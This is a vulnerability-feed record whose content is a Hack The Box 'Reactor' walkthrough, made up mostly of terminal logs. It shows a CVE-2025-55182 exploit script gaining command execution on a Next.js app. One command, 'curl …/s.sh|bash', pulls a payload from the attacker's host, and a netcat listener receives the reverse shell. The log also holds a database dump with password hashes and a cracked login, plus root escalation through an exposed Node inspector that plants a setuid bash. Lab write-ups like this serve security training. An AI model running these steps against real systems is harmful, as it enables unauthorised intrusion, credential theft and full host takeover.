{"uuid": "2b8ae3dc-90f9-48d3-a321-0d6f246b652c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-55182", "type": "seen", "source": "https://gist.github.com/byt3n33dl3/bd0aa49b7cae59f46c862ebb468d17bf", "content": "## HTB REACTOR - Linux (Easy)\n\n1. Network Enumeration\n\n```\n\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ ping -c2 10.129.12.203\nPING 10.129.12.203 (10.129.12.203) 56(84) bytes of data.\n64 bytes from 10.129.12.203: icmp_seq=1 ttl=63 time=244 ms\n64 bytes from 10.129.12.203: icmp_seq=2 ttl=63 time=243 ms\n\n--- 10.129.12.203 ping statistics ---\n2 packets transmitted, 2 received, 0% packet loss, time 1006ms\nrtt min/avg/max/mdev = 243.382/243.762/244.143/0.380 ms\n```\n\n```\n\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ sudo nmap -Pn -p- --min-rate 8000 10.129.12.203 -oA nmap/nmap\nStarting Nmap 7.98 ( https://nmap.org ) at \nNmap scan report for 10.129.12.203\nHost is up (0.24s latency).\nNot shown: 65533 closed tcp ports (reset)\nPORT STATE SERVICE\n22/tcp open ssh\n3000/tcp open ppp\n\nNmap done: 1 IP address (1 host up) scanned in seconds\n```\n \n``` \n\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ sudo nmap -Pn -p22,3000 -sC -sV 10.129.12.203 -oA nmap/nmap-port\nStarting Nmap 7.98 ( https://nmap.org ) at\nNmap scan report for 10.129.12.203\nHost is up (0.24s latency).\n\nPORT STATE SERVICE VERSION\n22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.16 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n| 256 ce:fd:0d:82:c0:23:ed:6e:4b:ea:13:fa:4f:ea:ef:b7 (ECDSA)\n|_ 256 f8:44:c6:46:58:7a:39:21:ef:16:44:e9:58:c2:f3:62 (ED25519)\n3000/tcp open ppp?\n| fingerprint-strings: \n| GetRequest: \n| HTTP/1.1 200 OK\n| Vary: RSC, Next-Router-State-Tree, Next-Router-Prefetch, Next-Router-Segment-Prefetch, Accept-Encoding\n| x-nextjs-cache: HIT\n| x-nextjs-prerender: 1\n| x-nextjs-stale-time: 4294967294\n| X-Powered-By: Next.js\n| Cache-Control: s-maxage=31536000, \n| ETag: \"p02u6gnhufd8t\"\n| Content-Type: text/html; charset=utf-8\n| Content-Length: 17175\n| Date: Wed, 03 Jun 2026 15:05:00 GMT\n| Connection: close\n| \n\n```\n\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ sudo python3 CVE-2025-55182.py -t http://10.129.12.203:3000/ -c \"id\" \n\n .______ _______ ___ ______ .___________. __ __ _______. __ __ _______ __ __ \n | _ \\ | ____| / \\ / || || | | | / || | | | | ____|| | | | \n | |_) | | |__ / ^ \\ | ,----'`---| |----`| | | | | (----`| |__| | | |__ | | | | \n | / | __| / /_\\ \\ | | | | | | | | \\ \\ | __ | | __| | | | | \n | |\\ \\----.| |____ / _____ \\ | `----. | | | | | | .----) | | | | | | |____ | `----.| `----.\n | _| `._____||_______/__/ \\__\\ \\______| |__| |__| |__| |_______/ |__| |__| |_______||_______||_______|\n \n[*] Target: http://10.129.12.203:3000/\n[*] Command: id\n\n[+] SUCCESS!\n\nuid=999(node) gid=988(node) groups=988(node)\n\n\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ sudo python3 CVE-2025-55182.py -t http://10.129.12.203:3000/ -c \"curl http://10.10.15.113/s.sh|bash\" \n\n .______ _______ ___ ______ .___________. __ __ _______. __ __ _______ __ __ \n | _ \\ | ____| / \\ / || || | | | / || | | | | ____|| | | | \n | |_) | | |__ / ^ \\ | ,----'`---| |----`| | | | | (----`| |__| | | |__ | | | | \n | / | __| / /_\\ \\ | | | | | | | | \\ \\ | __ | | __| | | | | \n | |\\ \\----.| |____ / _____ \\ | `----. | | | | | | .----) | | | | | | |____ | `----.| `----.\n | _| `._____||_______/__/ \\__\\ \\______| |__| |__| |__| |_______/ |__| |__| |_______||_______||_______|\n \n[*] Target: http://10.129.12.203:3000/\n[*] Command: curl http://10.10.15.113/s.sh|bash\n\n[+] SUCCESS!\n\n1224254375\n```\n\n```\n\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ sudo nc -lvnp 9001\nlistening on [any] 9001 ...\nconnect to [10.10.15.113] from (UNKNOWN) [10.129.12.203] 34248\nbash: cannot set terminal process group (1273): Inappropriate ioctl for device\nbash: no job control in this shell\nnode@reactor:/opt/reactor-app$ id\nid\nuid=999(node) gid=988(node) groups=988(node)\nnode@reactor:/opt/reactor-app$ cd /home\ncd /home\nnode@reactor:/home$ ls -al\nls -al\ntotal 16\ndrwxr-xr-x 4 root root 4096 May 18 11:40 .\ndrwxr-xr-x 23 root root 4096 May 20 10:07 ..\ndrwxr-x--- 4 engineer engineer 4096 May 20 10:12 engineer\ndrwxr-x--- 2 node node 4096 May 18 11:40 node\nnode@reactor:/home$ cd engineer\ncd engineer\nbash: cd: engineer: Permission denied\nnode@reactor:/home$ cd node\ncd node\nnode@reactor:~$ ls -al\nls -al\ntotal 20\ndrwxr-x--- 2 node node 4096 May 18 11:40 .\ndrwxr-xr-x 4 root root 4096 May 18 11:40 ..\nlrwxrwxrwx 1 root root 9 May 18 10:38 .bash_history -> /dev/null\n-rw-r--r-- 1 node node 220 Mar 31 2024 .bash_logout\n-rw-r--r-- 1 node node 3771 Mar 31 2024 .bashrc\n-rw-r--r-- 1 node node 807 Mar 31 2024 .profile\nnode@reactor:~$\n```\n\n4. Dump Database for Local User\n\n```\nnode@reactor:/opt/reactor-app$ which sqlite3\nwhich sqlite3\n/usr/bin/sqlite3\nnode@reactor:/opt/reactor-app$ sqlite3 reactor.db .dump\nsqlite3 reactor.db .dump\n. . .[SNIP]. . .\n);\nINSERT INTO users VALUES(1,'admin','a203b22191d744a4e70ada5c101b17b8','administrator','admin@reactor.htb');\nINSERT INTO users VALUES(2,'engineer','39d97110eafe2a9a68639812cd271e8e','operator','engineer@reactor.htb');\nCREATE TABLE sensor_logs (\n id INTEGER PRIMARY KEY,\n timestamp DATETIME DEFAULT CURRENT_TIMESTAMP,\n sensor_id TEXT,\n reading REAL,\n status TEXT\n);\nINSERT INTO sensor_logs VALUES(1,'2025-12-28 14:32:01','CORE_TEMP_01',324.5,'NOMINAL');\nINSERT INTO sensor_logs VALUES(2,'2025-12-28 14:32:01','PRESSURE_01',155.199999999999988,'NOMINAL');\nINSERT INTO sensor_logs VALUES(3,'2025-12-28 14:32:01','COOLANT_FLOW',18.3999999999999985,'CAUTION');\nCOMMIT;\nnode@reactor:/opt/reactor-app$\n```\n\n\n\nPS: Engineer passwd is cracked!\n\n```\nengineer:reactor1\n```\n\n5. Local User Access\n\n\n```\n\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ sudo netexec ssh 10.129.12.203 -u engineer -p reactor1 \nSSH 10.129.12.203 22 10.129.12.203 [*] SSH-2.0-OpenSSH_9.6p1 Ubuntu-3ubuntu13.16\nSSH 10.129.12.203 22 10.129.12.203 [+] engineer:reactor1 Linux - Shell access!\n\n\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ sudo ssh engineer@10.129.12.203\nengineer@10.129.12.203's password: \n ____ _____ _ ____ _____ ___ ____ \n| _ \\| ____| / \\ / ___|_ _/ _ \\| _ \\ \n| |_) | _| / _ \\| | | || | | | |_) |\n| _ <| |___ / ___ \\ |___ | || |_| | _ < \n|_| \\_\\_____/_/ \\_\\____| |_| \\___/|_| \\_\\\n\n ReactorWatch Core Monitoring System\n Nuclear Dynamics Corp. - Site 7\n \n AUTHORIZED PERSONNEL ONLY\nLast login: Wed Jun 3 15:14:48 2026 from 10.10.15.113\nengineer@reactor:~$ id\nuid=1000(engineer) gid=1000(engineer) groups=1000(engineer),4(adm),24(cdrom),30(dip),46(plugdev),101(lxd)\nengineer@reactor:~$\n```\n\n6. Privilege Escalation\n\n```\nengineer@reactor:~$ ss -tunlp\nNetid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process \nudp UNCONN 0 0 127.0.0.54:53 0.0.0.0:* \nudp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:* \nudp UNCONN 0 0 0.0.0.0:68 0.0.0.0:* \ntcp LISTEN 0 511 127.0.0.1:9229 0.0.0.0:* \ntcp LISTEN 0 4096 127.0.0.54:53 0.0.0.0:* \ntcp LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:* \ntcp LISTEN 0 4096 0.0.0.0:22 0.0.0.0:* \ntcp LISTEN 0 511 *:3000 *:* \ntcp LISTEN 0 4096 [::]:22 [::]:* \nengineer@reactor:~$ which node\n/usr/bin/node\n```\n\n```\nengineer@reactor:~$ ps aux | grep node\nnode 1273 14.8 3.7 11831056 147108 ? Ssl 15:02 2:14 next-server (v15.0.3)\nroot 1291 0.0 1.1 1066320 46176 ? Ssl 15:02 0:00 /usr/bin/node --inspect=127.0.0.1:9229 /opt/uptime-monitor/worker.js\nengineer 1725 0.0 0.0 6544 2280 pts/0 S+ 15:17 0:00 grep --color=auto node\nengineer@reactor:~$\n```\n\n```\nengineer@reactor:~$ /usr/bin/node --inspect=127.0.0.1:9229 /opt/uptime-monitor/worker.js\nStarting inspector on 127.0.0.1:9229 failed: address already in use\nuptime-monitor up, pid=1726\nnode:fs:2380\n return binding.writeFileUtf8(\n ^\n\nError: EACCES: permission denied, open '/var/log/uptime-monitor.csv'\n at Object.writeFileSync (node:fs:2380:20)\n. . .[SNIP]. . .\n errno: -13,\n code: 'EACCES',\n syscall: 'open',\n path: '/var/log/uptime-monitor.csv'\n}\n\nNode.js v20.20.2\nengineer@reactor:~$\n```\n\nChecking UID:\n\n```\nengineer@reactor:~$ node inspect 127.0.0.1:9229\nconnecting to 127.0.0.1:9229 ... ok\ndebug> exec(\"process.getuid()\")\n0\n\nAttack:\ndebug> exec(\"process.mainModule.require('child_process').execSync('cp /bin/bash /tmp/r00t && chmod +s /tmp/r00t')\")\nUint8Array(0)\n```\nExit\n```\nengineer@reactor:~$ cd /tmp\nengineer@reactor:/tmp$ ls -al\ntotal 1476\ndrwxrwxrwt 15 root root 4096 Jun 3 15:19 .\ndrwxr-xr-x 23 root root 4096 May 20 10:07 ..\ndrwxrwxrwt 2 root root 4096 Jun 3 15:02 .font-unix\ndrwxrwxrwt 2 root root 4096 Jun 3 15:02 .ICE-unix\n-rwsr-sr-x 1 root root 1446024 Jun 3 15:19 r00t\n. . .[SNIP]. . .\ndrwx------ 2 root root 4096 Jun 3 15:03 vmware-root_727-4290690966\ndrwxrwxrwt 2 root root 4096 Jun 3 15:02 .X11-unix\ndrwxrwxrwt 2 root root 4096 Jun 3 15:02 .XIM-unix\nengineer@reactor:/tmp$ /tmp/r00t -p\nr00t-5.2# id\nuid=1000(engineer) gid=1000(engineer) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),101(lxd),1000(engineer)\nr00t-5.2# cd /root\nr00t-5.2# ls -al\ntotal 44\ndrwx------ 7 root root 4096 Jun 3 15:02 .\ndrwxr-xr-x 23 root root 4096 May 20 10:07 ..\n-rw------- 1 root root 0 May 20 10:12 .bash_history\n. . .[SNIP]. . .\n-rw-r--r-- 1 root root 161 Apr 22 2024 .profile\n-rw-r----- 1 root root 33 Jun 3 15:02 root.txt\ndrwx------ 2 root root 4096 Dec 28 20:30 .ssh\nr00t-5.2# whoami\nroot\n```\n\n### Done!\n- ", "creation_timestamp": "2026-06-03T15:34:27.000000Z"}